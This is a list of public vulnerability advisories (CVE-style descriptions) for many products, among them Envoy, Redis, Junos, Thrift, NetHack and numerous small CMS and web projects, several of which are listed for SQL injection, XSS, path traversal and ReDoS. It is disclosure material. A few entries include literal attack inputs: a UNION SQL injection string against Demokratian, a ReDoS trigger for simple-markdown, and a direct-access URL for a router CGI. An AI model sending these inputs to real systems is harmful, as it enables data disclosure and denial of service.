The devise_masquerade gem before 1.3 allows certain attacks when a password's salt is unknown. An application that uses this gem to let administrators masquerade/impersonate users loses one layer of security protection compared to a situation where Devise (without this extension) is used. If the server-side secret_key_base value became publicly known (for instance if it is committed to a public repository by mistake), there are still other protections in place that prevent an attacker from impersonating any user on the site. When masquerading is not used in a plain Devise application, one must know the password salt of the target user if one wants to encrypt and sign a valid session cookie. When devise_masquerade is used, however, an attacker can decide which user the "back" action will go back to without knowing that user's password salt and simply knowing the user ID, by manipulating the session cookie and pretending that a user is already masqueraded by an administrator.
A missing authorization vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 allows a remote attacker to access at least the URL "/fpui/jsp/index.jsp" leading to unknown impact, presumably some violation of confidentiality. Older versions of FatPipe software may also be vulnerable. The FatPipe advisory identifier for this vulnerability is FPSA004.
A CSV injection vulnerability found in Online Invoicing System (OIS) 4.3 and below can be exploited by users to perform malicious actions such as redirecting admins to unknown or harmful websites, or disclosing other clients' details that the user did not have access to.
Envoy is a cloud-native high-performance edge/middle/service proxy. In Envoy version 1.17.0 an attacker can bypass authentication by presenting a JWT token with an issuer that is not in the provider list when Envoy's JWT Authentication filter is configured with the `allow_missing` requirement under `requires_any` due to a mistake in implementation. Envoy's JWT Authentication filter can be configured with the `allow_missing` requirement that will be satisfied if JWT is missing (JwtMissed error) and fail if JWT is presented or invalid. Due to a mistake in implementation, a JwtUnknownIssuer error was mistakenly converted to JwtMissed when `requires_any` was configured. So if `allow_missing` was configured under `requires_any`, an attacker can bypass authentication by presenting a JWT token with an issuer that is not in the provider list. Integrity may be impacted depending on configuration if the JWT token is used to protect against writes or modifications. This regression was introduced on 2020/11/12 in PR 13839 which fixed handling `allow_missing` under RequiresAny in a JwtRequirement (see issue 13458). The AnyVerifier aggregates the children verifiers' results into a final status where JwtMissing is the default error. However, a JwtUnknownIssuer was mistakenly treated the same as a JwtMissing error and the resulting final aggregation was the default JwtMissing. As a result, `allow_missing` would allow a JWT token with an unknown issuer status. This is fixed in version 1.17.1 by PR 15194. The fix works by preferring JwtUnknownIssuer over a JwtMissing error, fixing the accidental conversion and bypass with `allow_missing`. A user could detect whether a bypass occurred if they have Envoy logs enabled with debug verbosity. Users can enable component level debug logs for JWT. The JWT filter logs will indicate that there is a request with a JWT token and a failure that the JWT token is missing.
Redis is an open-source, in-memory database that persists on disk. In affected versions of Redis an integer overflow bug in 32-bit Redis version 4.0 or newer could be exploited to corrupt the heap and potentially result with remote code execution. Redis 4.0 or newer uses a configurable limit for the maximum supported bulk input size. By default, it is 512MB which is a safe value for all platforms. If the limit is significantly increased, receiving a large request from a client may trigger several integer overflow scenarios, which would result with buffer overflow and heap corruption. We believe this could in certain conditions be exploited for remote code execution. By default, authenticated Redis users have access to all configuration parameters and can therefore use the &amp;#8220;CONFIG SET proto-max-bulk-len&amp;#8221; to change the safe default, making the system vulnerable. **This problem only affects 32-bit Redis (on a 32-bit system, or as a 32-bit executable running on a 64-bit system).** The problem is fixed in version 6.2, and the fix is back ported to 6.0.11 and 5.0.11. Make sure you use one of these versions if you are running 32-bit Redis. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent clients from directly executing `CONFIG SET`: Using Redis 6.0 or newer, ACL configuration can be used to block the command. Using older versions, the `rename-command` configuration directive can be used to rename the command to a random string unknown to users, rendering it inaccessible. Please note that this workaround may have an additional impact on users or operational systems that expect `CONFIG SET` to behave in certain ways.
A vulnerability in Juniper Networks Junos OS, which only affects the release 18.4R2-S5, where a function is inconsistently implemented on Juniper Networks Junos QFX5000 Series and EX4600 Series, and if "storm-control enhanced" is configured, can lead to the enhanced storm control filter group not be installed. It will cause storm control not to work hence allowing an attacker to cause high CPU usage or packet loss issues by sending a large amount of broadcast or unknown unicast packets arriving the device. This issue affects Juniper Networks QFX5100, QFX5110, QFX5120, QFX5200, QFX5210, EX4600, and EX4650, and QFX5100 with QFX 5e Series image installed. QFX5130 and QFX5220 are not affected from this issue. This issue affects Juniper Networks Junos OS 18.4R2-S5 on QFX5000 Series and EX4600 Series. No other product or platform is affected by this vulnerability.
A signal handler race condition exists in the Layer 2 Address Learning Daemon (L2ALD) of Juniper Networks Junos OS due to the absence of a specific protection mechanism to avoid a race condition which may allow an attacker to bypass the storm-control feature on devices. This issue is a corner case and only occurs during specific actions taken by an administrator of a device under certain specifics actions which triggers the event. The event occurs less frequently on devices which are not configured with Virtual Chassis configurations, and more frequently on devices configured in Virtual Chassis configurations. This issue is not specific to any particular Junos OS platform. An Indicator of Compromise (IoC) may be seen by reviewing log files for the following error message seen by executing the following show statement: show log messages | grep storm Result to look for: /kernel: GENCFG: op 58 (Storm Control Blob) failed; err 1 (Unknown) This issue affects: Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D49 on EX Series; 15.1 versions prior to 15.1R7-S6; 15.1X49 versions prior to 15.1X49-D191, 15.1X49-D200 on SRX Series; 16.1 versions prior to 16.1R7-S7; 16.2 versions prior to 16.2R2-S11, 16.2R3; 17.1 versions prior to 17.1R2-S11, 17.1R3; 17.2 versions prior to 17.2R2-S8, 17.2R3-S3; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S5; 18.2 versions prior to 18.2R2-S6, 18.2R3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S5, 18.4R2; 19.1 versions prior to 19.1R1-S4, 19.1R2.
On Juniper Networks EX and QFX5K Series platforms configured with Redundant Trunk Group (RTG), Storm Control profile applied on the RTG interface might not take affect when it reaches the threshold condition. Storm Control enables the device to monitor traffic levels and to drop broadcast, multicast, and unknown unicast packets when a specified traffic level is exceeded, thus preventing packets from proliferating and degrading the LAN. Note: this issue does not affect EX2200, EX3300, EX4200, and EX9200 Series. This issue affects Juniper Networks Junos OS on EX Series and QFX5K Series: 15.1 versions prior to 15.1R7-S7; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S3; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2.
All versions of bson before 1.1.4 are vulnerable to Deserialization of Untrusted Data. The package will ignore an unknown value for an object's _bsotype, leading to cases where an object is serialized as a document rather than the intended BSON type.
Spring Integration framework provides Kryo Codec implementations as an alternative for Java (de)serialization. When Kryo is configured with default options, all unregistered classes are resolved on demand. This leads to the "deserialization gadgets" exploit when provided data contains malicious code for execution during deserialization. In order to protect against this type of attack, Kryo can be configured to require a set of trusted classes for (de)serialization. Spring Integration should be proactive against blocking unknown "deserialization gadgets" when configuring Kryo in code.
When configured to enable default typing, Jackson contained a deserialization vulnerability that could lead to arbitrary code execution. Jackson fixed this vulnerability by blacklisting known "deserialization gadgets". Spring Batch configures Jackson with global default typing enabled which means that through the previous exploit, arbitrary code could be executed if all of the following is true: * Spring Batch's Jackson support is being leveraged to serialize a job's ExecutionContext. * A malicious user gains write access to the data store used by the JobRepository (where the data to be deserialized is stored). In order to protect against this type of attack, Jackson prevents a set of untrusted gadget classes from being deserialized. Spring Batch should be proactive against blocking unknown "deserialization gadgets" when enabling default typing.
In NetHack before 3.6.5, detecting an unknown configuration file option can cause a buffer overflow resulting in a crash or remote code execution/privilege escalation. This vulnerability affects systems that have NetHack installed suid/sgid and shared systems that allow users to upload their own configuration files. Users should upgrade to NetHack 3.6.5.
In NetHack before 3.6.5, unknown options starting with -de and -i can cause a buffer overflow resulting in a crash or remote code execution/privilege escalation. This vulnerability affects systems that have NetHack installed suid/sgid and shared systems that allow users to influence command line options. Users should upgrade to NetHack 3.6.5.
A vulnerability was found in nescalante urlregex up to 0.5.0 and classified as problematic. This issue affects some unknown processing of the file index.js of the component Backtracking. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.5.1 is able to address this issue. The identifier of the patch is e5a085afe6abfaea1d1a78f54c45af9ef43ca1f9. It is recommended to upgrade the affected component.
A vulnerability was found in rl-institut NESP2 Initial Release/1.0. It has been classified as critical. Affected is an unknown function of the file app/database.py. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 07c0cdf36cf6a4345086d07b54423723a496af5e. It is recommended to apply a patch to fix this issue. VDB-246642 is the identifier assigned to this vulnerability.
A vulnerability was found in paxswill EVE Ship Replacement Program 0.12.11. It has been rated as problematic. This issue affects some unknown processing of the file src/evesrp/views/api.py of the component User Information Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. Upgrading to version 0.12.12 is able to address this issue. The patch is named 9e03f68e46e85ca9c9694a6971859b3ee66f0240. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220211.
A vulnerability was found in GENI Portal. It has been rated as problematic. Affected by this issue is some unknown functionality of the file portal/www/portal/error-text.php. The manipulation of the argument error leads to cross site scripting. The attack may be launched remotely. The patch is identified as c2356cc41260551073bfaa3a94d1ab074f554938. It is recommended to apply a patch to fix this issue. VDB-218474 is the identifier assigned to this vulnerability.
A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation leads to path traversal. The identifier of the patch is c4c0f0138ab5afbac58e03915d446680421bde28. It is recommended to apply a patch to fix this issue. The identifier VDB-218461 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in IonicaBizau node-gry up to 5.x. This affects an unknown part. The manipulation leads to command injection. Upgrading to version 6.0.0 is able to address this issue. The patch is named 5108446c1e23960d65e8b973f1d9486f9f9dbd6c. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218019.
A vulnerability was found in mholt PapaParse up to 5.1.x. It has been classified as problematic. Affected is an unknown function of the file papaparse.js. The manipulation leads to inefficient regular expression complexity. Upgrading to version 5.2.0 is able to address this issue. The name of the patch is 235a12758cd77266d2e98fd715f53536b34ad621. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218004.
A vulnerability, which was classified as critical, was found in pouetnet pouet 2.0. This affects an unknown part. The manipulation of the argument howmany leads to sql injection. The identifier of the patch is 11d615931352066fb2f6dcb07428277c2cd99baf. It is recommended to apply a patch to fix this issue. The identifier VDB-217641 was assigned to this vulnerability.
A vulnerability classified as critical has been found in YunoHost-Apps transmission_ynh. Affected is an unknown function of the file conf/nginx.conf. The manipulation leads to path traversal. The patch is identified as f136dfd44eda128129e5fd2d850a3a3c600e6a4a. It is recommended to apply a patch to fix this issue. VDB-217638 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in square squalor. This affects an unknown part. The manipulation leads to sql injection. Upgrading to version v0.0.0 is able to address this issue. The patch is named f6f0a47cc344711042eb0970cb423e6950ba3f93. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217623.
A vulnerability has been found in jamesmartin Inline SVG up to 1.7.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file lib/inline_svg/action_view/helpers.rb of the component URL Parameter Handler. The manipulation of the argument filename leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.7.2 is able to address this issue. The identifier of the patch is f5363b351508486021f99e083c92068cf2943621. It is recommended to upgrade the affected component. The identifier VDB-217597 was assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Chris92de AdminServ. It has been rated as problematic. This issue affects some unknown processing of the file resources/core/adminserv.php. The manipulation of the argument error leads to cross site scripting. The attack may be initiated remotely. The patch is named 9a45087814295de6fb3a3fe38f96293665234da1. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217043. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Chris92de AdminServ. It has been declared as problematic. This vulnerability affects unknown code of the file resources/core/adminserv.php. The manipulation of the argument text leads to cross site scripting. The attack can be initiated remotely. The patch is identified as 3ed17dab3b4d6e8bf1c82ddfbf882314365e9cd7. It is recommended to apply a patch to fix this issue. VDB-217042 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability was found in Macaron i18n. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file i18n.go. The manipulation leads to open redirect. The attack can be launched remotely. Upgrading to version 0.5.0 is able to address this issue. The name of the patch is 329b0c4844cc16a5a253c011b55180598e707735. It is recommended to upgrade the affected component. The identifier VDB-216745 was assigned to this vulnerability.
A vulnerability was found in ahorner text-helpers up to 1.0.x. It has been declared as critical. This vulnerability affects unknown code of the file lib/text_helpers/translation.rb. The manipulation of the argument link leads to use of web link to untrusted target with window.opener access. The attack can be initiated remotely. Upgrading to version 1.1.0 is able to address this issue. The name of the patch is 184b60ded0e43c985788582aca2d1e746f9405a3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216520.
A vulnerability was found in sah-comp bienlein and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The name of the patch is d7836a4f2b241e4745ede194f0f6fb47199cab6b. It is recommended to apply a patch to fix this issue. The identifier VDB-216473 was assigned to this vulnerability.
A vulnerability classified as critical has been found in Furqan node-whois. Affected is an unknown function of the file index.coffee. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). It is possible to launch the attack remotely. The name of the patch is 46ccc2aee8d063c7b6b4dee2c2834113b7286076. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216252.
A vulnerability was found in annyshow DuxCMS 2.1. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215116.
A vulnerability was found in annyshow DuxCMS 2.1. It has been classified as problematic. This affects an unknown part of the file admin.php&amp;r=article/AdminContent/edit of the component Article Handler. The manipulation of the argument content leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215115.
A vulnerability, which was classified as problematic, has been found in Tribal Systems Zenario CMS. Affected by this issue is some unknown functionality of the file admin_organizer.js of the component Error Log Module. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is dfd0afacb26c3682a847bea7b49ea440b63f3baa. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-212816.
A vulnerability has been found in SialWeb CMS and classified as problematic. This vulnerability affects unknown code of the component Search Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in SialWeb CMS. This affects an unknown part of the file /about.php. The manipulation of the argument Id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Demokratian. This affects an unknown part of the file install/install3.php. The manipulation leads to privilege escalation. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue.
A vulnerability was found in Demokratian. It has been rated as critical. Affected by this issue is some unknown functionality of the file basicos_php/genera_select.php. The manipulation of the argument id_provincia with the input -1%20union%20all%20select%201,2,3,4,database() leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue.
A vulnerability, which was classified as critical, was found in Neetai Tech. Affected is an unknown function of the file /product.php. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Lógico y Creativo 1.0 and classified as critical. This issue affects some unknown processing. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely.
A vulnerability was found in Eatan CMS. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The attack can be launched remotely.
A vulnerability was found in Everywhere CMS. It has been classified as critical. Affected is an unknown function. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely.
A vulnerability was found in Brandbugle. It has been rated as critical. Affected by this issue is some unknown functionality of the file /main.php. The manipulation leads to sql injection. The attack may be launched remotely.
A vulnerability classified as critical has been found in MINMAX. This affects an unknown part of the file /newsDia.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely.
A vulnerability was found in easyii CMS. It has been classified as problematic. Affected is an unknown function of the file /admin/sign/out. The manipulation leads to cross site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Klapp App and classified as problematic. This issue affects some unknown processing of the JSON Web Token Handler. The manipulation leads to weak authentication. The attack may be initiated remotely.
A vulnerability has been found in Klapp App and classified as problematic. This vulnerability affects unknown code of the component Authorization. The manipulation leads to information disclosure (Credentials). The attack can be initiated remotely. It is recommended to upgrade the affected app.
A vulnerability, which was classified as problematic, has been found in Server Status. This issue affects some unknown processing of the component HTTP Status/SMTP Status. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in Countdown Timer. This vulnerability affects unknown code of the component Macro Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in Linking. This affects an unknown part of the component New Windows Macro. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Refined Toolkit. It has been rated as problematic. Affected by this issue is some unknown functionality of the component UI-Image/UI-Button. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
An issue was discovered in the bumpalo crate before 3.2.1 for Rust. The realloc feature allows the reading of unknown memory. Attackers can potentially read cryptographic keys.
An information disclosure vulnerability exists in RT-AC88U Download Master before 3.1.0.108. A direct access to /downloadmaster/dm_apply.cgi?action_mode=initial&amp;download_type=General&amp;special_cgi=get_language makes it possible to reach "unknown functionality" in a "known to be easy" manner via an unspecified "public exploit."
DualShield 5.9.8.0821 allows username enumeration on its login form. A valid username results in prompting for the password, whereas an invalid one will produce an "unknown username" error message.
Validate.js provides a declarative way of validating javascript objects. All versions as of 30 November 2020 contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, it is unknown if any patches are available.
Validate.js provides a declarative way of validating javascript objects. Versions 0.11.3 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, it is unknown if any patches are available.
Foundation is a front-end framework. Versions 6.3.3 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, it is unknown if any fixes are available.
Creeper is an experimental dynamic, interpreted language. The binary release of Creeper Interpreter 1.1.3 contains potential malware. The compromised binary release was available for a few hours between December 26, 2020 at 3:22 PM EST to December 26, 2020 at 11:00 PM EST. If you used the source code, you are **NOT** affected. This only affects the binary releases. The binary of unknown quality has been removed from the release. If you have downloaded the binary, please delete it and run a reputable antivirus scanner to ensure that your computer is clean.
go-ipfs is an open-source golang implementation of IPFS which is a global, versioned, peer-to-peer filesystem. In go-ipfs before version 0.8.0, control characters are not escaped from console output. This can result in hiding input from the user which could result in the user taking an unknown, malicious action. This is fixed in version 0.8.0.
A flaw was found in JBCS httpd in version 2.4.37 SP3, where it uses a back-end worker SSL certificate with the keystore file's ID is 'unknown'. The validation of the certificate whether CN and hostname are matching stopped working and allow connecting to the back-end work. The highest threat from this vulnerability is to data integrity.
An issue was discovered on LG mobile devices with Android OS 7.0, 7.1, 7.2, 8.0, and 8.1 software. Applications with sensitive security settings (such as the package verifier application) mishandle unknown-source installations. The LG ID is LVE-SMP-190002 (September 2020).
SNMPTT before 1.4.2 allows attackers to execute shell code via EXEC, PREXEC, or unknown_trap_exec.
Information disclosure vulnerability in HCL Commerce 9.0.1.9 through 9.0.1.14 and 9.1 through 9.1.4 could allow a remote attacker to obtain user personal data via unknown vectors.
An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds read and write in DwaCompressor::uncompress in ImfDwaCompressor.cpp when handling the UNKNOWN compression case.
In Puma (RubyGem) before 4.3.5 and 3.12.6, a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client. This is a similar but different vulnerability from CVE-2020-11076. The problem has been fixed in Puma 3.12.6 and Puma 4.3.5.
CodeIgniter through 4.0.0 allows remote attackers to gain privileges via a modified Email ID to the "Select Role of the User" page. NOTE: A contributor to the CodeIgniter framework argues that the issue should not be attributed to CodeIgniter. Furthermore, the blog post reference shows an unknown website built with the CodeIgniter framework but that CodeIgniter is not responsible for introducing this issue because the framework has never provided a login screen, nor any kind of login or user management facilities beyond a Session library. Also, another reporter indicates the issue is with a custom module/plugin to CodeIgniter, not CodeIgniter itself.
pam-krb5 before 4.9 has a buffer overflow that might cause remote code execution in situations involving supplemental prompting by a Kerberos library. It may overflow a buffer provided by the underlying Kerberos library by a single '\0' byte if an attacker responds to a prompt with an answer of a carefully chosen length. The effect may range from heap corruption to stack corruption depending on the structure of the underlying Kerberos library, with unknown effects but possibly including code execution. This code path is not used for normal authentication, but only when the Kerberos library does supplemental prompting, such as with PKINIT or when using the non-standard no_prompt PAM configuration option.
If WebRTC permission is requested from documents with data: or blob: URLs, the permission notifications do not properly display the originating domain. The notification states "Unknown origin" as the requestee, leading to user confusion about which site is asking for this permission. This vulnerability affects Firefox &lt; 66.
Legacy C++ Facebook Thrift servers (using cpp instead of cpp2) would not error upon receiving messages with containers of fields of unknown type. As a result, malicious clients could send short messages which would take a long time for the server to parse, potentially leading to denial of service. This issue affects Facebook Thrift prior to v2019.05.06.00.
Go Facebook Thrift servers would not error upon receiving messages with containers of fields of unknown type. As a result, malicious clients could send short messages which would take a long time for the server to parse, potentially leading to denial of service. This issue affects Facebook Thrift prior to v2019.03.04.00.
Java Facebook Thrift servers would not error upon receiving messages with containers of fields of unknown type. As a result, malicious clients could send short messages which would take a long time for the server to parse, potentially leading to denial of service. This issue affects Facebook Thrift prior to v2019.02.18.00.
Python Facebook Thrift servers would not error upon receiving messages with containers of fields of unknown type. As a result, malicious clients could send short messages which would take a long time for the server to parse, potentially leading to denial of service. This issue affects Facebook Thrift prior to v2019.02.18.00.
C++ Facebook Thrift servers (using cpp2) would not error upon receiving messages with containers of fields of unknown type. As a result, malicious clients could send short messages which would take a long time for the server to parse, potentially leading to denial of service. This issue affects Facebook Thrift prior to v2019.02.18.00.
A vulnerability was found in mpedraza2020 Intranet del Monterroso up to 4.50.0. It has been classified as critical. This affects an unknown part of the file config/cargos.php. The manipulation of the argument dni_profe leads to sql injection. Upgrading to version 4.51.0 is able to address this issue. The identifier of the patch is 678190bee1dfd64b54a2b0e88abfd009e78adce8. It is recommended to upgrade the affected component. The identifier VDB-252717 was assigned to this vulnerability.
A vulnerability was found in Ethex Contracts. It has been classified as critical. This affects an unknown part of the file EthexJackpot.sol of the component Monthly Jackpot Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 6b8664b698d3d953e16c284fadc6caeb9e58e3db. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248271.
A vulnerability classified as problematic was found in dstar2018 Agency up to 61. Affected by this vulnerability is an unknown functionality of the file search.php. The manipulation of the argument QSType/QuickSearch leads to cross site scripting. The attack can be launched remotely. The patch is named 975b56953efabb434519d9feefcc53685fb8d0ab. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-244495.
A vulnerability, which was classified as problematic, was found in dro.pm. This affects an unknown part of the file web/fileman.php. The manipulation of the argument secret/key leads to cross site scripting. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named fa73c3a42bc5c246a1b8f815699ea241aef154bb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-221763.
A vulnerability has been found in simple-markdown 0.5.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file simple-markdown.js. The manipulation leads to inefficient regular expression complexity. The attack can be launched remotely. Upgrading to version 0.5.2 is able to address this issue. The patch is named 89797fef9abb4cab2fb76a335968266a92588816. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220639.
A vulnerability, which was classified as problematic, was found in simple-markdown 0.6.0. Affected is an unknown function of the file simple-markdown.js. The manipulation with the input &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;:/:/:/:/:/:/:/:/:/:/ leads to inefficient regular expression complexity. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.6.1 is able to address this issue. The patch is identified as 015a719bf5cdc561feea05500ecb3274ef609cd2. It is recommended to upgrade the affected component. VDB-220638 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in OnShift TurboGears 1.0.11.10. This affects an unknown part of the file turbogears/controllers.py of the component HTTP Header Handler. The manipulation leads to http response splitting. It is possible to initiate the attack remotely. Upgrading to version 1.0.11.11 is able to address this issue. The patch is named f68bbaba47f4474e1da553aa51564a73e1d92a84. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220059.
A vulnerability was found in happyman twmap. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file twmap3/data/ajaxCRUD/pointdata2.php. The manipulation of the argument id leads to sql injection. Upgrading to version v2.9_v4.31 is able to address this issue. The identifier of the patch is babbec79b3fa4efb3bd581ea68af0528d11bba0c. It is recommended to upgrade the affected component. The identifier VDB-217645 was assigned to this vulnerability.
A vulnerability classified as critical was found in Arthmoor QSF-Portal. This vulnerability affects unknown code of the file index.php. The manipulation of the argument a leads to path traversal. The patch is identified as ea4f61e23ecb83247d174bc2e2cbab521c751a7d. It is recommended to apply a patch to fix this issue. VDB-217558 is the identifier assigned to this vulnerability.
A vulnerability was found in soerennb eXtplorer up to 2.1.12. It has been classified as critical. This affects an unknown part of the file include/archive.php of the component Archive Handler. The manipulation leads to path traversal. Upgrading to version 2.1.13 is able to address this issue. The identifier of the patch is b8fcb888f4ff5e171c16797a4b075c6c6f50bf46. It is recommended to upgrade the affected component. The identifier VDB-217437 was assigned to this vulnerability.
A vulnerability was found in soerennb eXtplorer up to 2.1.12 and classified as critical. Affected by this issue is some unknown functionality of the component Directory Content Handler. The manipulation leads to path traversal. Upgrading to version 2.1.13 is able to address this issue. The name of the patch is b8fcb888f4ff5e171c16797a4b075c6c6f50bf46. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-217436.
A vulnerability has been found in soerennb eXtplorer up to 2.1.12 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 2.1.13 is able to address this issue. The patch is named b8fcb888f4ff5e171c16797a4b075c6c6f50bf46. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-217435.
A vulnerability, which was classified as problematic, was found in kakwa LdapCherry up to 0.x. Affected is an unknown function of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.0.0 is able to address this issue. The patch is identified as 6f98076281e9452fdb1adcd1bcbb70a6f968ade9. It is recommended to upgrade the affected component. VDB-217434 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in innologi appointments Extension up to 2.0.5 on TYPO3. This affects an unknown part of the component Appointment Handler. The manipulation of the argument formfield leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.6 is able to address this issue. The identifier of the patch is 986d3cb34e5e086c6f04e061f600ffc5837abe7f. It is recommended to upgrade the affected component. The identifier VDB-217353 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in nsupdate.info. This affects an unknown part of the file src/nsupdate/settings/base.py of the component CSRF Cookie Handler. The manipulation of the argument CSRF_COOKIE_HTTPONLY leads to cookie without 'httponly' flag. It is possible to initiate the attack remotely. The name of the patch is 60a3fe559c453bc36b0ec3e5dd39c1303640a59a. It is recommended to apply a patch to fix this issue. The identifier VDB-216909 was assigned to this vulnerability.
A vulnerability was found in FreePBX arimanager up to 13.0.5.3 and classified as problematic. Affected by this issue is some unknown functionality of the component Views Handler. The manipulation of the argument dataurl leads to cross site scripting. The attack may be launched remotely. Upgrading to version 13.0.5.4 is able to address this issue. The name of the patch is 199dea7cc7020d3c469a86a39fbd80f5edd3c5ab. It is recommended to upgrade the affected component. VDB-216878 is the identifier assigned to this vulnerability.
A vulnerability has been found in Morgawr Muon 0.1.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file src/muon/handler.clj. The manipulation leads to insufficiently random values. The attack can be launched remotely. Upgrading to version 0.2.0-indev is able to address this issue. The name of the patch is c09ed972c020f759110c707b06ca2644f0bacd7f. It is recommended to upgrade the affected component. The identifier VDB-216877 was assigned to this vulnerability.
A vulnerability was found in ytti Oxidized Web. It has been classified as problematic. Affected is an unknown function of the file lib/oxidized/web/views/conf_search.haml. The manipulation of the argument to_research leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 55ab9bdc68b03ebce9280b8746ef31d7fdedcc45. It is recommended to apply a patch to fix this issue. VDB-216870 is the identifier assigned to this vulnerability.
